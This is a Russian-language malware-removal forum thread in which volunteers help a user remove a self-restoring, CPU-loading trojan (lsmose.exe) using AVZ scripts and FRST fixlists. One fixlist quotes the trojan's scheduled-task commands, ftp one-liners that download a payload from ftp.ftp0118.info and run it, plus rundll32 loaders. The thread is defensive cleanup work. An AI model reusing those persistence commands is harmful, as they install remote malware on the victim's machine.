Перейти к содержанию

Троян lsmose.exe нагружающий процессор


evilmolen

Рекомендуемые сообщения

Приветствую!
После установки новой системы каким-то боком умудрился поймать троян.
Пока нашел его только тут:
c:\Windows\debug\lsmose.exe
c:\Windows\help\lsmose.exe
Mysa 1(C:\Windows\System32\Tasks\Mysa1)
Mysa 2(C:\Windows\System32\Tasks\Mysa2)
Mysa 3(C:\Windows\System32\Tasks\Mysa3)
ok(C:\Windows\System32\Tasks\ok)

Удаление файлов ничего не даёт, автозагрузку чистил, весь мусор удалял, но он каким-то образом восстанавливает сам себя.
Надеюсь на вашу помощь!

 

CollectionLog-2018.03.20-21.53.zip

Ссылка на комментарий
Поделиться на другие сайты

Выполните скрипт в AVZ

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 DeleteService('mssecsvc2.0');
 TerminateProcessByName('C:\Windows\debug\lsmose.exe');
 QuarantineFile('C:\Windows\debug\lsmose.exe','');
 TerminateProcessByName('c:\windows\syswow64\lsmos.exe');
 QuarantineFile('c:\windows\syswow64\lsmos.exe','');
 DeleteFile('c:\windows\syswow64\lsmos.exe','32');
 DeleteFile('C:\Windows\debug\lsmose.exe','32');
 DeleteFile('C:\WINDOWS\mssecsvc.exe','32');
 DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('C:\Windows\system32\Tasks\ok','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN).

Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к следующему сообщению НОВЫЕ логи.

  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты

Спасибо, что помогаете! В своё время на соседнем форуме на такие жалобы стали просто забивать =\

Ответ бота о получении архива карантина - KLAN-7794046976
Гуглопочта никак не хочет архив с вирусом пропускать, только загрузив на ГДиск смог отправить.

email:

Thank you for contacting Kaspersky Lab

The specified URLs have been scanned with the Kaspersky Security Network cloud service.

Our antivirus databases do not contain the specified URLs:
https://drive.google.com/file/d/1ZfIdjTMb5qx0QFZ36Rxm819ATnXZmOP9/view?usp=drive_web

We will thoroughly analyze URLs you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.

This is an automatically generated message. Please do not reply to it.

Anti-Virus Lab, Kaspersky Lab HQ

"39A/3 Leningradskoe Shosse, Moscow, 125212, Russia
Tel./Fax: + 7 (495) 797 8700



Обнаружил файл трояна в папке "C:\Windows\Help", просто удалил предварительно сохранив в архив, если он вам понадобится.
Посмотрим что будет дальше.

CollectionLog-2018.03.21-00.56.zip

Изменено пользователем evilmolen
Ссылка на комментарий
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Отчеты, полученные в пунктах 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.

  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты

Не могу отредактировать сообщение, извиняюсь за даблпост.
Троян снова живёт в системе, опять наделал тех же файлов что и в прошлый раз, опять грузит процессор.

Ссылка на комментарий
Поделиться на другие сайты

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
Task: {14AF3EA3-9A38-45DF-B6BC-386BC6D4D1D4} - \Mysa3 -> No File <==== ATTENTION
Task: {E0AD7587-2863-4D18-8ED7-79B891161342} - \ok -> No File <==== ATTENTION
Task: {E1E0715D-2ED7-4C5A-8359-8CD9CAFE1A45} - \Mysa1 -> No File <==== ATTENTION
Task: {ECA3BC3F-4036-47A3-B6F6-3E71796C3339} - \Mysa2 -> No File <==== ATTENTION
Task: {F0BFAF96-3862-497C-A12B-AAE9A61D0640} - \Mysa -> No File <==== ATTENTION
Reboot:
2. Нажмите ФайлСохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файлаВсе файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты

Весь день ждал, пока троян запустится, т.к. вчера он опять проявился, но сегодня он молчит почему-то.
В соседней теме я видел что советовали не убивать процессы трояна, а именно при его активности вести сбор логов, это верное утверждение?
 

FRST64.rar

Ссылка на комментарий
Поделиться на другие сайты

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
2018-03-21 12:34 - 2018-03-21 23:54 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2018-03-21 12:34 - 2018-03-21 23:54 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2018-03-21 12:34 - 2018-03-21 23:54 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-03-21 12:34 - 2018-03-21 23:54 - 000003186 _____ C:\Windows\System32\Tasks\ok
2018-03-21 12:34 - 2018-03-21 12:34 - 002696192 _____ C:\Windows\SysWOW64\lsmos.exe
Task: {D939863D-B1DF-496F-9694-E260D163B99C} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {4C82D806-B518-4BAE-A410-FFA6ADF0119A} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {59EDC14C-60C2-451E-8F88-21C9D44654CC} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {667FFF52-1F86-4CBB-8343-F10384B5FBF3} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
c:\windows\debug\ok.dat
c:\windows\debug\item.dat
Reboot:
2. Нажмите ФайлСохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файлаВсе файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.
Ссылка на комментарий
Поделиться на другие сайты

Видимо я что-то не так делаю, опять ошибки "could not remove. Access Denied".
У меня контроль учётных записей пользователей UAC отключен, по идее у единственного пользователя права администратора есть.

Fixlog.txt

Ссылка на комментарий
Поделиться на другие сайты

Удалите в МВАМ все, кроме

PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.7\STANDALONEPHASE1.DAT, Проигнорировано пользователем, [661], [393793],1.0.4450

 

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • tau34
      От tau34
      Здравствуйте зашел на один сайт посмотреть pdf документ и Касперский выдад уведомление , мне сейчас надо как то удалять его или что? пишет вот такой троян:  HEUR:Trojan.PDF.Badur.gena
      я просто в браузере pdf открыл этот там видать ссылка на вредоносный сайт или что раз так Касперский срнагировал
       
      Сообщение от модератора kmscom Тема перемещена из раздела Помощь по персональным продуктам  
       
       
       
       
       
       
       
       

    • timoshka
      От timoshka
      И так я скачал игру(пиратку, не горжусь) и при проверки системы нашло троян. Прошел все удаление, перезапуск системы. Но я не уверен что он удалился на 100%, как это можно проверить? прошел быструю проверку ничего не нашло, щас запустил полную. 
      Возможно ли что антивирусник так ошибся и ка точно удалить троян если он остался(мб система не удалило его)
      Да, мне страшно...
      как закончится полная напишу что сказало
       
      ничего не нашло, только написало что 1 обьект не был проверен в облаке, может ли быть это троян?
    • yukawaii
      От yukawaii
      Здравствуйте!

      Помогите, пожалуйста, решить две проблемы:

      1) Появилась недавно. Зависает периодически Проводник (не реагирует нижняя панель проводника, альт+таб и кнопка Виндоуз на клавиатуре не реагируют) секунд на 5. При этом компьютер не висит: браузер, игры, мышь - всё работает.
      Началось около недели назад, не понимаю из-за чего.
      2) Появилась давно. Системные прерывания периодически нагружают ЦП на 100% на несколько секунд.  Если через программу Process Lasso заблокировать запуск процесса RuntimeBroker.exe, то это явление пропадает. Но тогда нельзя выключить компьютер, пока запущена Process Lasso (просто не выключается при нажатии Завершить работу).

      Проверки антивирусами ничего не находят. 
       
      CollectionLog-2024.10.14-22.01.zip
    • JAZZ and JAZZ
      От JAZZ and JAZZ
      При включении ноутбука и загрузки ОС через 2-5мин начинается нагрев ЦП до 92 градусов GPU до 63 градусов.
      При этом сам запускается процесс fc.exe в видеокарте NVIDIA хотя она должна быть не активной, проблему поймал день назад ноут уходит в сильный перегрев.
      Пробовал лечить, результата нет.
      CollectionLog-2024.10.07-23.37.zip
    • Tetis
      От Tetis
      Здравствуйте. Винда 10,  антивирус 360 Total Security, каким то образом у меня появился браузер 360 от этого китайского антивируса, примерно 10 дней назад. 14.10.24  появилась программа WPS office. Появились сами. Решил удалить WPS office, но их небыло в списках программ. Удалил с Revo Uninstaller. Перестал работать microsoft office, файлы не открывались. Я скачал 3 варианта microsoft office 2013 в интернете, все пробовал установить, получилось только с 1. Также скачивал прогру для подбора ключа, в итоге подобрал, но потом он слетел. Офис заработал. Комп стал медленее работать, постоянно на максимум вентилятор, греется, жесткий диск крутит . Включил сегодня антивирус, обнаружил вирус updater.exe infected with Trojan.Siggen29.46190, он его удаляет, а вирус постоянно снова появляется в папке C:\ProgramData\Google\Chrome\updater.exe , появляются окна что троян, нажимаю удалить... и так бескнечно, каждые 5 сек. появляется окно антивируса с трояном, я нажимаю удалить.  Dr.Web CureIt ничего не находит, скачал Eset Online Scanner и указал проверку диска С, он нашел вирусы, сейчас процесс проверки пока пишу. CollectionLog-2024.10.20-21.33.zip Что делать, подскажите пожалуйста.
       
×
×
  • Создать...